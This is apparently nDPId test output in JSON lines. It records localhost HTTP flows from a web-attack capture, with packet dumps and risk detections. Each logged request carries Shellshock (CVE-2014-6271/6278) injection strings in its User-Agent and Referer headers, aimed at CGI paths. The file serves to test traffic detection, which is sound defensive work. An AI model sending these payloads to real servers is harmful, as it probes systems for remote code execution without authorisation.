00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
